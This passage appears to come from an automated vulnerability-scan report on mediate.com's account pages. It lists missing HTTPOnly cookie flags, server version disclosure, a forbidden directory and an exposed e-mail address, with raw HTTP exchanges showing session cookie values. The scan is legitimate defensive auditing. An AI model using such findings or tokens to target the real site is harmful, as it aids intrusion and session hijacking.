
<option value="Reports,report" >Reports</option>

<option value="Restorative,VORP, VOMA" >Restorative</option>

<option value="Schools,school" >Schools</option>

<option value="Simulations" >Simulations</option>

<option value="Special Education,special ed" >Special Education</option>

<option value="Spirituality" >Spirituality</option>

<option value="Standards" >Standards</option>

<option value="System Design,systems" >System Design</option>

<option value="Technology" >Technology</option>

<option value="Terrorism,terror" >Terrorism</option>

<option value="Testimonials" >Testimonials</option>

<option value="Training" >Training</option>

<option value="Transformative" >Transformative</option>

<option value="UK,England, British, Britain, Ireland, Scotland, Wales" >UK</option>

<option value="UMA,uniform mediation act" >UMA</option>

<option value="UPL,unauthorized practice of law" >UPL</option>

<option value="Video Best Clips" >Video Best Clips</option>

<option value="Workplace,work" >Workplace</option>

<option value="Youth,school" >Youth</option>

</SELECT>

<SPAN style="font-size:12px;color:#CCCCCC">&nbsp;&nbsp;and/or search terms</SPAN>&nbsp;&nbsp;
<input type="text" name="stext" style="font-size:11px;width:125px">
<input type="submit" name="GO" id="yllwgo" value="GO">
</FORM></td>
</TR>
</TABLE>






<TABLE WIDTH="990" BORDER="0" CELLPADDING="0" CELLSPACING="0" align="center" style="background-color:#fff">
<TR>
<TD class="contentcell" valign="top" style="padding: 0 30px 0 30px">





<h2 id="hdr">Log In To Mediate.com</h2>

<hr id="hr">



<BR>
<form name="CFForm_1" id="CFForm_1" action="https://www.mediate.com/order/account.cfm" method="post" onsubmit="return _CF_checkCFForm_1(this)">
<input type="hidden" name="pwcheck" value="ad31cc91272e">



<table border="0" align="center" cellspacing="0" bgcolor="f2f2f2" style="font-family:arial; font-size:12px; text-align:left;margin-top:25px; margin-bottom:25px;border:1px solid #000;width:580px">
<tr>
<td bgcolor="#000066" style="padding:7px; font-size:14px;font-weight:bold;color:#fff ; ">Sign in to access your Mediate.com account:</td>
</tr>
<tr><td style="font-family:verdana,arial,san-serif; font-size:12px; padding:10px 0 0 200px">


Client ID:&nbsp;&nbsp;&nbsp;<input name="username" id="username" type="text" maxlength="20" size="20" />

<br>

Password: <input name="pw" id="pw" type="password" maxlength="20" size="20" />



</td></tr>

<tr><td height="30" style="font-family:verdana,arial,san-serif; font-size:12px;text-align:center;" size="25">
<INPUT TYPE="submit" value="&nbsp;&nbsp;&nbsp;&nbsp;OK&nbsp;&nbsp;&nbsp;&nbsp;">

</td>
</tr>
<TR>
<td colspan="2" align="center" style="padding-bottom:15px">
<br>
<font face="Arial,Helvetica" size="2">
<i><a href="/order/pwd.cfm?camefrom=%2Faccount%2Findex%2Ecfm">Forget your password?</a></i>
</font>
</td>
</TR>
</table>


</form>
<br>
<br>
<br>
<br>
<br>
<br><br>
<br>
<br>
<br>
<br>

<br>
<br>
<br>





<br>
<br>
<br>


<div align="center" style="margin-top:20px;font-size:12px;">
<a href="http://www.mediate.com/mediator/search.cfm">Mediator Di..
Cookie Not Marked As HttpOnly

Cookie Not Marked As HttpOnly

1 TOTAL
LOW
CONFIRMED
1
Cookie was not marked as HTTPOnly. HTTPOnly cookies can not be read by client-side scripts therefore marking a cookie as HTTPOnly can provide an additional layer of protection against Cross-site Scripting attacks..

Impact

During a Cross-site Scripting attack an attacker might easily access cookies and hijack the victim's session.

Actions to Take

  1. See the remedy for solution
  2. Consider marking all of the cookies used by the application as HTTPOnly (After these changes javascript code will not able to read cookies.

Remedy

Mark the cookie as HTTPOnly. This will be an extra layer of defence against XSS. However this is not a silver bullet and will not protect the system against Cross-site Scripting attacks. An attacker can use a tool such as XSS Tunnel to bypass HTTPOnly protection.

External References

- /account/

/account/ CONFIRMED

https://www.mediate.com/account/

Identified Cookie

CFID

Request

GET /account/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mediate.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Apr 2011 00:42:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=7214712;expires=Sun, 14-Apr-2041 00:42:38 GMT;path=/,CFTOKEN=65155520;expires=Sun, 14-Apr-2041 00:42:38 GMT;path=/,CART_ID=755;expires=Tue, 26-Apr-2011 00:42:38 GMT;path=/,MIRCCOMMENTER=7966319;expires=Wed, 20-Apr-2016 00:42:38 GMT;path=/,THISAC=214;expires=Wed, 20-Apr-2016 00:42:38 GMT;path=/,THISCOUNTRY=USA;expires=Wed, 20-Apr-2016 00:42:38 GMT;path=/,LASTLOGIN=%7Bts%20%272011%2D04%2D21%2017%3A42%3A36%27%7D;expires=Sat, 21-Apr-2012 00:42:38 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!-- Copyright 1998-2007 Resourceful Internet Solution, Inc. All rights reserved. -->



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>

<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script><script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>
<TITLE>Log In To Mediate.com</TITLE>
<META name="description" content="Your Mediate.com Account">
<META name="keywords" content="mediation, mediate, mediator,lawyer,conflict resolution,mediators, training, mediation training, public policy, dispute, ADR,facilitation, meeting management, process, communication, barriers, divorce, workplace, effects,custody,resolution,conflict management,parenting,gender">
<SCRIPT language="JavaScript" src="../navload.js"></SCRIPT>
<script language="JavaScript" src="orders.js"></script>
<LINK href="../mainstyle2.css" rel="stylesheet" type="text/css">


<link href="../css/accordian.css" type="text/css" rel="stylesheet">

<script type="text/javascript" src="js/prototype.js"></script>
<script type="text/javascript" src="js/effects.js"></script>
<script type="text/javascript" src="js/accordion.js"></script>



<script type="text/javascript">

//
// In my case I want to load them onload, this is how you do it!
//
//Event.observe(window, 'load', loadAccordions, false);

//
// Set up all accordions
//
function loadAccordions() {
var topAccordion = new accordion('vertical_container', {
classNames : {
toggle : 'vertical_accordion_toggle',
toggleActive : 'vertical_accordion_toggle_active',
content : 'vertical_accordion_content'
},
defaultSize : {
width : 750
},
direction : 'vertical'
});

var bottomAccordion = new accordion('vertical_container');

var nestedVerticalAccordion = new accordion('vertical_nested_container', {
classNames : {
toggle : 'vertical_accordion_toggle',
toggleActive : 'vertical_accordion_toggle_active',
content : 'vertical_accordion_content'
}
});

// Open first one
bottomAccordion.activate($$('#vertical_container .accordion_toggle')[0]);

// Open second one
//topAccordion.activate($$('#horizontal_container .horizontal_accordion_toggle')[2]);
}

function Poktoconvert(clientid,productid) {
var msg = 'Are you sure you want to convert this expired '+productid+' to LAM1A?';
if (confirm(msg))
location="../order/convtolam1a.cfm?clientid=" + clientid + "&productid=" + productid;
}

function Poktoactivate(clientid) {
var msg = 'Please confirm: ok to activate your membership?';

if (confirm(msg))
location="../order/activatemembership.cfm?clientid=" + clientid;
}

</script>


<script type="text/javascript"> if (window.ColdFusion) ColdFusion.required['username']=true;</script><script type="text/javascript"> if (window.ColdFusion) ColdFusion.required['pw']=true;</script><script type="text/javascript"><!-- _CF_checkCFForm_1 = function(_CF_this) { //reset on submit _CF_error_exists = false; _CF_error_messages = new Array(); _CF_error_fields = new Object(); _CF_FirstErrorField = null; //form element username required check if( !_CF_hasValue(_CF_this['username'], "TEXT", false ) ) { _CF_onError(_CF_this, "username", _CF_this['username'].value, "Enter your user id"); _CF_error_exists = true; } //form element pw required check if( !_CF_hasValue(_CF_this['pw'], "PASSWORD", false ) ) { _CF_onError(_CF_this, "pw", _CF_this['pw'].value, "Enter password"); _CF_error_exists = true; } //display error messages and return success if( _CF_error_exists ) { if( _CF_error_messages.length > 0 ) { // show alert() message _CF_onErrorAlert(_CF_error_messages); // set focus to first form error, if the field supports js focus(). if( _CF_this[_CF_FirstErrorField].type == "text" ) { _CF_this[_CF_FirstErrorField].focus(); } } return false; }else { return true; } }//--></script></HEAD>

<BODY>

<DESCRIPTION></DESCRIPTION>






<script language="JavaScript" type="text/JavaScript">
<!--
function lamin() {
stateval = "";
for(var i=0; i < lamform.stateprovince.options.length; i++)
if (lamform.stateprovince.options[i].selected)
stateval = lamform.stateprovince.options[i].value;
if (lamform.ac.value>0 && stateval!='') {
alert("Select either the area code OR the state but not both");
return false;
}
}
//-->
</script>




<!-- 12321 173.193.214.243 -->


<TABLE WIDTH="990" BORDER="0" CELLPADDING="0" CELLSPACING="0" CLASS="med-tp-bar" align="center">
<TR>

<TD WIDTH="428" class="topcells">

<A HREF="http://www.mediate.com/index.cfm"><IMG SRC="https://www.mediate.com/micart/nav_top_lft_2009.gif" WIDTH="427" HEIGHT="87" BORDER="0" alt="Mediate.com - Complete information about mediation and mediators"></A></td>

<TD WIDTH="539" align="right" class="topcells" style="padding-right:10px;"><form action="http://www.mediate.com/search.cfm" method="post" style="padding:0px; margin:0px">
<SPAN style="font-size:1.1em;color:#CCCCCC;font-weight:bold">Search content: &nbsp;</SPAN>
<select name="stext" style="font-size:11px;">
<option value="">&nbsp;&nbsp;&nbsp;&nbsp;--- Topic ---&nbsp;&nbsp;&nbsp;

<option value=":about/index.cfm:">About Mediation</option>

<option value="Academic,university, graduate" >Academic</option>

<option value="ADA,disability, Americans With Disabilities Act" >ADA</option>

<option value=":adrnews/index.cfm:">ADR News</option>

<option value="Africa,African" >Africa</option>

<option value="Apology,confession, explanation, guilt, apologize" >Apology</option>

<option value="Arbitration,arbitrate, arbitrator" >Arbitration</option>

<option value="Asia,Asia, China, India, Pakastan, Japan, Australia, New Zealand, Korea, Viet Nam" >Asia</option>

<option value="Australia,Aussie" >Australia</option>

<option value="Best Practice" >Best Practice</option>

<option value="Blog Archive" >Blog Archive</option>

<option value=":blogs/index.cfm:">Blogs</option>

<option value="Book Reviews,book" >Book Reviews</option>

<option value="Bullying,Bully" >Bullying</option>

<option value="CA Canada,Canadian" >CA - Canada</option>

<option value=":careers/index.cfm:">Careers in ADR</option>

<option value="Coaching,coach" >Coaching</option>

<option value="Collab Practice,collaborative law" >Collab Practice</option>

<option value="Commercial,business" >Commercial</option>

<option value="Communication" >Communication</option>

<option value="Community" >Community</option>

<option value="Confidentiality,privacy, confidential" >Confidentiality</option>

<option value="Conflict Theory,theory" >Conflict Theory</option>

<option value="Construction" >Construction</option>

<option value="Courts Legal" >Courts - Legal</option>

<option value="Custody,parenting, parenting plan" >Custody</option>

<option value="Diplomacy" >Diplomacy</option>

<option value="Diversity,minority, race, ethnic" >Diversity</option>

<option value="Divorce" >Divorce</option>

<option value="Elder,senior" >Elder</option>

<option value="Employment,employee" >Employment</option>

<option value="Environment" >Environment</option>

<option value="Espanol,Spanish" >Espanol</option>

<option value="Ethics,standards" >Ethics</option>

<option value="EU,Europe, European" >EU</option>

<option value="Facilitation" >Facilitation</option>

<option value="Family" >Family</option>

<option value="Foreclosure" >Foreclosure</option>

<option value="Gay,homosexual, lesbian" >Gay</option>

<option value="Gender" >Gender</option>

<option value="Government" >Government</option>

<option value="Health,medical, hospital" >Health</option>

<option value="Humor,comedy" >Humor</option>

<option value="International" >International</option>

<option value="Interviews" >Interviews</option>

<option value="Keystone Conf.,Keystone" >Keystone Conf.</option>

<option value="Labor,FMCS" >Labor</option>

<option value="Latin America" >Latin America</option>

<option value="Leadership,Leader" >Leadership</option>

<option value="Legislation" >Legislation</option>

<option value="Letters to Editor" >Letters to Editor</option>

<option value="Marital Mediation,marriage" >Marital Mediation</option>

<option value="Mediation Policy" >Mediation Policy</option>

<option value="Mediation Practice" >Mediation Practice</option>

<option value="Mediation Skills,technique" >Mediation Skills</option>

<option value="Memorials" >Memorials</option>

<option value="Middle East,Israel, Terror, Iran, Iraq, Syria, Lebanon, Egypt, Jordon, Saudi Arabia" >Middle East</option>

<option value="Negotiation" >Negotiation</option>

<option value=":newsletters/index.cfm:">Newsletters</option>

<option value="Online DR,internet, ODR" >Online DR</option>

<option value="Partnering" >Partnering</option>

<option value="Peer Mediation" >Peer Mediation</option>

<option value="Probate,estate, elder" >Probate</option>

<option value="Psychological,mental, emotional" >Psychological</option>

<option value="Public Policy" >Public Policy</option>

<option value="Recommended,recommend" >Recommended</option>

<option value="Reports,report" >Reports</option>

<option value="Restorative,VORP, VOMA" >Restorative</option>

<option value="Schools,school" >Schools</option>

<option value="Simulations" >Simulations</option>

<option value="Special Education,special ed" >Special Education</option>

<option value="Spirituality" >Spirituality</option>

<option value="Standards" >Standards</option>

<option value="System Design,systems" >System Design</option>

<option value="Technology" >Technology</option>

<option value="Terrorism,terror" >Terrorism</option>

<option value="Testimonials" >Testimonials</option>

<option value="Training" >Training</option>

<option value="Transformative" >Transformative</option>

<option value="UK,England, British, Britain, Ireland, Scotland, Wales" >UK</option>

<option value="UMA,uniform mediation act" >UMA</option>

<option value="UPL,unauthorized practice of law" >UPL</option>

<option value="Video Best Clips" >Video Best Clips</option>

<option value="Workplace,work" >Workplace</option>

<option value="Youth,school" >Youth</option>

</SELECT>

<SPAN style="font-size:12px;color:#CCCCCC">&nbsp;&nbsp;and/or search terms</SPAN>&nbsp;&nbsp;
<input type="text" name="stext" style="font-size:11px;width:125px">
<input type="submit" name="GO" id="yllwgo" value="GO">
</FORM></td>
</TR>
</TABLE>






<TABLE WIDTH="990" BORDER="0" CELLPADDING="0" CELLSPACING="0" align="center" style="background-color:#fff">
<TR>
<TD class="contentcell" valign="top" style="padding: 0 30px 0 30px">





<h2 id="hdr">Log In To Mediate.com</h2>

<hr id="hr">



<BR>
<form name="CFForm_1" id="CFForm_1" action="https://www.mediate.com/order/account.cfm" method="post" onsubmit="return _CF_checkCFForm_1(this)">
<input type="hidden" name="pwcheck" value="ad31cc91272e">



<table border="0" align="center" cellspacing="0" bgcolor="f2f2f2" style="font-family:arial; font-size:12px; text-align:left;margin-top:25px; margin-bottom:25px;border:1px solid #000;width:580px">
<tr>
<td bgcolor="#000066" style="padding:7px; font-size:14px;font-weight:bold;color:#fff ; ">Sign in to access your Mediate.com account:</td>
</tr>
<tr><td style="font-family:verdana,arial,san-serif; font-size:12px; padding:10px 0 0 200px">


Client ID:&nbsp;&nbsp;&nbsp;<input name="username" id="username" type="text" maxlength="20" size="20" />

<br>

Password: <input name="pw" id="pw" type="password" maxlength="20" size="20" />



</td></tr>

<tr><td height="30" style="font-family:verdana,arial,san-serif; font-size:12px;text-align:center;" size="25">
<INPUT TYPE="submit" value="&nbsp;&nbsp;&nbsp;&nbsp;OK&nbsp;&nbsp;&nbsp;&nbsp;">

</td>
</tr>
<TR>
<td colspan="2" align="center" style="padding-bottom:15px">
<br>
<font face="Arial,Helvetica" size="2">
<i><a href="/order/pwd.cfm?camefrom=%2Faccount%2Findex%2Ecfm">Forget your password?</a></i>
</font>
</td>
</TR>
</table>


</form>
<br>
<br>
<br>
<br>
<br>
<br><br>
<br>
<br>
<br>
<br>

<br>
<br>
<br>





<br>
<br>
<br>


<div align="center" style="margin-top:20px;font-size:12px;">
<a href="http://www.mediate.com/mediator/search.cfm">Mediator Di..
Forbidden Resource

Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /account/js/

/account/js/ CONFIRMED

https://www.mediate.com/account/js/

Request

GET /account/js/ HTTP/1.1
Referer: https://www.mediate.com/account/js/prototype.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mediate.com
Cookie: CFID=7214713; CFTOKEN=77816388; CART_ID=746; THISAC=214; THISCOUNTRY=USA; LASTLOGIN=%7Bts%20%272011%2D04%2D21%2017%3A42%3A33%27%7D
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Fri, 22 Apr 2011 00:42:39 GMT
Content-Length: 218
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET


<html><head><title>Error</title></head><body><head><title>Directory Listing Denied</title></head><body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /account/viewglossary.cfm

/account/viewglossary.cfm

https://www.mediate.com/account/viewglossary.cfm?Help=

Found E-mails

server@kargo.net

Request

GET /account/viewglossary.cfm?Help= HTTP/1.1
Referer: https://www.mediate.com/account/orders.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mediate.com
Cookie: CFID=7214712; CFTOKEN=65155520; CART_ID=755; THISAC=214; THISCOUNTRY=USA; LASTLOGIN=%7Bts%20%272011%2D04%2D21%2017%3A42%3A36%27%7D; MIRCCOMMENTER=7966319
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Apr 2011 00:42:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8



<html>

<body>
<br>

We're sorry - - An Error Occured. <br>We have been automatically notified.<br>
If <b>YOU</b> wish to be informed when this error is tracked down and fixed, then <br>
<a href="mailto:server@kargo.net?subject=WebSite Error at {ts '2011-04-21 17:42:49'}">click here.</a><br> Thanks

<br>
-------------------------
<br>


</body>
</html>

IIS Version Disclosure

IIS Version Disclosure

1 TOTAL
INFORMATION
Netsparker identified that the target web server is disclosing the web server's version in the HTTP response. This information can help an attacker to gain a greater understanding of the system in use and potentially develop further attacks targeted at the specific web server version.

Impact

An attacker can look for specific security vulnerabilities for the version identified through the SERVER header information.

Remediation

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /account/

/account/

https://www.mediate.com/account/

Extracted Version

Microsoft-IIS/6.0

Request

GET /account/ HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mediate.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Apr 2011 00:42:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=7214714;expires=Sun, 14-Apr-2041 00:42:35 GMT;path=/,CFTOKEN=81598723;expires=Sun, 14-Apr-2041 00:42:35 GMT;path=/,CART_ID=763;expires=Tue, 26-Apr-2011 00:42:35 GMT;path=/,THISAC=214;expires=Wed, 20-Apr-2016 00:42:35 GMT;path=/,THISCOUNTRY=USA;expires=Wed, 20-Apr-2016 00:42:35 GMT;path=/,LASTLOGIN=%7Bts%20%272011%2D04%2D21%2017%3A42%3A33%27%7D;expires=Sat, 21-Apr-2012 00:42:35 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!-- Copyright 1998-2007 Resourceful Internet Solution, Inc. All rights reserved. -->



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<HTML>

<HEAD><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script><script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>
<TITLE>Log In To Mediate.com</TITLE>
<META name="description" content="Your Mediate.com Account">
<META name="keywords" content="mediation, mediate, mediator,lawyer,conflict resolution,mediators, training, mediation training, public policy, dispute, ADR,facilitation, meeting management, process, communication, barriers, divorce, workplace, effects,custody,resolution,conflict management,parenting,gender">
<SCRIPT language="JavaScript" src="../navload.js"></SCRIPT>
<script language="JavaScript" src="orders.js"></script>
<LINK href="../mainstyle2.css" rel="stylesheet" type="text/css">


<link href="../css/accordian.css" type="text/css" rel="stylesheet">

<script type="text/javascript" src="js/prototype.js"></script>
<script type="text/javascript" src="js/effects.js"></script>
<script type="text/javascript" src="js/accordion.js"></script>



<script type="text/javascript">

//
// In my case I want to load them onload, this is how you do it!
//
//Event.observe(window, 'load', loadAccordions, false);

//
// Set up all accordions
//
function loadAccordions() {
var topAccordion = new accordion('vertical_container', {
classNames : {
toggle : 'vertical_accordion_toggle',
toggleActive : 'vertical_accordion_toggle_active',
content : 'vertical_accordion_content'
},
defaultSize : {
width : 750
},
direction : 'vertical'
});

var bottomAccordion = new accordion('vertical_container');

var nestedVerticalAccordion = new accordion('vertical_nested_container', {
classNames : {
toggle : 'vertical_accordion_toggle',
toggleActive : 'vertical_accordion_toggle_active',
content : 'vertical_accordion_content'
}
});

// Open first one
bottomAccordion.activate($$('#vertical_container .accordion_toggle')[0]);

// Open second one
//topAccordion.activate($$('#horizontal_container .horizontal_accordion_toggle')[2]);
}

function Poktoconvert(clientid,productid) {
var msg = 'Are you sure you want to convert this expired '+productid+' to LAM1A?';
if (confirm(msg))
location="../order/convtolam1a.cfm?clientid=" + clientid + "&productid=" + productid;
}

function Poktoactivate(clientid) {
var msg = 'Please confirm: ok to activate your membership?';

if (confirm(msg))
location="../order/activatemembership.cfm?clientid=" + clientid;
}

</script>


<script type="text/javascript"> if (window.ColdFusion) ColdFusion.required['username']=true;</script><script type="text/javascript"> if (window.ColdFusion) ColdFusion.required['pw']=true;</script><script type="text/javascript"><!-- _CF_checkCFForm_1 = function(_CF_this) { //reset on submit _CF_error_exists = false; _CF_error_messages = new Array(); _CF_error_fields = new Object(); _CF_FirstErrorField = null; //form element username required check if( !_CF_hasValue(_CF_this['username'], "TEXT", false ) ) { _CF_onError(_CF_this, "username", _CF_this['username'].value, "Enter your user id"); _CF_error_exists = true; } //form element pw required check if( !_CF_hasValue(_CF_this['pw'], "PASSWORD", false ) ) { _CF_onError(_CF_this, "pw", _CF_this['pw'].value, "Enter password"); _CF_error_exists = true; } //display error messages and return success if( _CF_error_exists ) { if( _CF_error_messages.length > 0 ) { // show alert() message _CF_onErrorAlert(_CF_error_messages); // set focus to first form error, if the field supports js focus(). if( _CF_this[_CF_FirstErrorField].type == "text" ) { _CF_this[_CF_FirstErrorField].focus(); } } return false; }else { return true; } }//--></script></HEAD>

<BODY>

<DESCRIPTION></DESCRIPTION>






<script language="JavaScript" type="text/JavaScript">
<!--
function lamin() {
stateval = "";
for(var i=0; i < lamform.stateprovince.options.length; i++)
if (lamform.stateprovince.options[i].selected)
stateval = lamform.stateprovince.options[i].value;
if (lamform.ac.value>0 && stateval!='') {
alert("Select either the area code OR the state but not both");
return false;
}
}
//-->
</script>




<!-- 12321 173.193.214.243 -->


<TABLE WIDTH="990" BORDER="0" CELLPADDING="0" CELLSPACING="0" CLASS="med-tp-bar" align="center">
<TR>

<TD WIDTH="428" class="topcells">

<A HREF="http://www.mediate.com/index.cfm"><IMG SRC="https://www.mediate.com/micart/nav_top_lft_2009.gif" WIDTH="427" HEIGHT="87" BORDER="0" alt="Mediate.com - Complete information about mediation and mediators"></A></td>

<TD WIDTH="539" align="right" class="topcells" style="padding-right:10px;"><form action="http://www.mediate.com/search.cfm" method="post" style="padding:0px; margin:0px">
<SPAN style="font-size:1.1em;color:#CCCCCC;font-weight:bold">Search content: &nbsp;</SPAN>
<select name="stext" style="font-size:11px;">
<option value="">&nbsp;&nbsp;&nbsp;&nbsp;--- Topic ---&nbsp;&nbsp;&nbsp;

<option value=":about/index.cfm:">About Mediation</option>

<option value="Academic,university, graduate" >Academic</option>

<option value="ADA,disability, Americans With Disabilities Act" >ADA</option>

<option value=":adrnews/index.cfm:">ADR News</option>

<option value="Africa,African" >Africa</option>

<option value="Apology,confession, explanation, guilt, apologize" >Apology</option>

<option value="Arbitration,arbitrate, arbitrator" >Arbitration</option>

<option value="Asia,Asia, China, India, Pakastan, Japan, Australia, New Zealand, Korea, Viet Nam" >Asia</option>

<option value="Australia,Aussie" >Australia</option>

<option value="Best Practice" >Best Practice</option>

<option value="Blog Archive" >Blog Archive</option>

<option value=":blogs/index.cfm:">Blogs</option>

<option value="Book Reviews,book" >Book Reviews</option>

<option value="Bullying,Bully" >Bullying</option>

<option value="CA Canada,Canadian" >CA - Canada</option>

<option value=":careers/index.cfm:">Careers in ADR</option>

<option value="Coaching,coach" >Coaching</option>

<option value="Collab Practice,collaborative law" >Collab Practice</option>

<option value="Commercial,business" >Commercial</option>

<option value="Communication" >Communication</option>

<option value="Community" >Community</option>

<option value="Confidentiality,privacy, confidential" >Confidentiality</option>

<option value="Conflict Theory,theory" >Conflict Theory</option>

<option value="Construction" >Construction</option>

<option value="Courts Legal" >Courts - Legal</option>

<option value="Custody,parenting, parenting plan" >Custody</option>

<option value="Diplomacy" >Diplomacy</option>

<option value="Diversity,minority, race, ethnic" >Diversity</option>

<option value="Divorce" >Divorce</option>

<option value="Elder,senior" >Elder</option>

<option value="Employment,employee" >Employment</option>

<option value="Environment" >Environment</option>

<option value="Espanol,Spanish" >Espanol</option>

<option value="Ethics,standards" >Ethics</option>

<option value="EU,Europe, European" >EU</option>

<option value="Facilitation" >Facilitation</option>

<option value="Family" >Family</option>

<option value="Foreclosure" >Foreclosure</option>

<option value="Gay,homosexual, lesbian" >Gay</option>

<option value="Gender" >Gender</option>

<option value="Government" >Government</option>

<option value="Health,medical, hospital" >Health</option>

<option value="Humor,comedy" >Humor</option>

<option value="International" >International</option>

<option value="Interviews" >Interviews</option>

<option value="Keystone Conf.,Keystone" >Keystone Conf.</option>

<option value="Labor,FMCS" >Labor</option>

<option value="Latin America" >Latin America</option>

<option value="Leadership,Leader" >Leadership</option>

<option value="Legislation" >Legislation</option>

<option value="Letters to Editor" >Letters to Editor</option>

<option value="Marital Mediation,marriage" >Marital Mediation</option>

<option value="Mediation Policy" >Mediation Policy</option>

<option value="Mediation Practice" >Mediation Practice</option>

<option value="Mediation Skills,technique" >Mediation Skills</option>

<option value="Memorials" >Memorials</option>

<option value="Middle East,Israel, Terror, Iran, Iraq, Syria, Lebanon, Egypt, Jordon, Saudi Arabia" >Middle East</option>

<option value="Negotiation" >Negotiation</option>

<option value=":newsletters/index.cfm:">Newsletters</option>

<option value="Online DR,internet, ODR" >Online DR</option>

<option value="Partnering" >Partnering</option>

<option value="Peer Mediation" >Peer Mediation</option>

<option value="Probate,estate, elder" >Probate</option>

<option value="Psychological,mental, emotional" >Psychological</option>

<option value="Public Policy" >Public Policy</option>

<option value="Recommended,recommend" >Recommended</option>

<option value="Reports,report" >Reports</option>

<option value="Restorative,VORP, VOMA" >Restorative</option>

<option value="Schools,school" >Schools</option>

<option value="Simulations" >Simulations</option>

<option value="Special Education,special ed" >Special Education</option>

<option value="Spirituality" >Spirituality</option>

<option value="Standards" >Standards</option>

<option value="System Design,systems" >System Design</option>

<option value="Technology" >Technology</option>

<option value="Terrorism,terror" >Terrorism</option>

<option value="Testimonials" >Testimonials</option>

<option value="Training" >Training</option>

<option value="Transformative" >Transformative</option>

<option value="UK,England, British, Britain, Ireland, Scotland, Wales" >UK</option>

<option value="UMA,uniform mediation act" >UMA</option>

<option value="UPL,unauthorized practice of law" >UPL</option>

<option value="Video Best Clips" >Video Best Clips</option>

<option value="Workplace,work" >Workplace</option>

<option value="Youth,school" >Youth</option>

</SELECT>

<SPAN style="font-size:12px;color:#CCCCCC">&nbsp;&nbsp;and/or search terms</SPAN>&nbsp;&nbsp;
<input type="text" name="stext" style="font-size:11px;width:125px">
<input type="submit" name="GO" id="yllwgo" value="GO">
</FORM></td>
</TR>
</TABLE>






<TABLE WIDTH="990" BORDER="0" CELLPADDING="0" CELLSPACING="0" align="center" style="background-color:#fff">
<TR>
<TD class="contentcell" valign="top" style="padding: 0 30px 0 30px">





<h2 id="hdr">Log In To Mediate.com</h2>

<hr id="hr">



<BR>
<form name="CFForm_1" id="CFForm_1" action="https://www.mediate.com/order/account.cfm" method="post" onsubmit="return _CF_checkCFForm_1(this)">
<input type="hidden" name="pwcheck" value="ad31cc91272e">



<table border="0" align="center" cellspacing="0" bgcolor="f2f2f2" style="font-family:arial; font-size:12px; text-align:left;margin-top:25px; margin-bottom:25px;border:1px solid #000;width:580px">
<tr>
<td bgcolor="#000066" style="padding:7px; font-size:14px;font-weight:bold;color:#fff ; ">Sign in to access your Mediate.com account:</td>
</tr>
<tr><td style="font-family:verdana,arial,san-serif; font-size:12px; padding:10px 0 0 200px">


Client ID:&nbsp;&nbsp;&nbsp;<input name="username" id="username" type="text" maxlength="20" size="20" />

<br>

Password: <input name="pw" id="pw" type="password" maxlength="20" size="20" />



</td></tr>

<tr><td height="30" style="font-family:verdana,arial,san-serif; font-size:12px;text-align:center;" size="25">
<INPUT TYPE="submit" value="&nbsp;&nbsp;&nbsp;&nbsp;OK&nbsp;&nbsp;&nbsp;&nbsp;">

</td>
</tr>
<TR>
<td colspan="2" align="center" style="padding-bottom:15px">
<br>
<font face="Arial,Helvetica" size="2">
<i><a href="/order/pwd.cfm?camefrom=%2Faccount%2Findex%2Ecfm">Forget your password?</a></i>
</font>
</td>
</TR>
</table>


</form>
<br>
<br>
<br>
<br>
<br>
<br><br>
<br>
<br>
<br>
<br>

<br>
<br>
<br>





<br>
<br>
<br>


<div align="center" style="margin-top:20px;font-size:12px;">
<a href="http://www.mediate.com/mediator/search.cfm">Mediator Directory</a> &nbsp;&nbsp;&nbsp;&nbsp;
&l..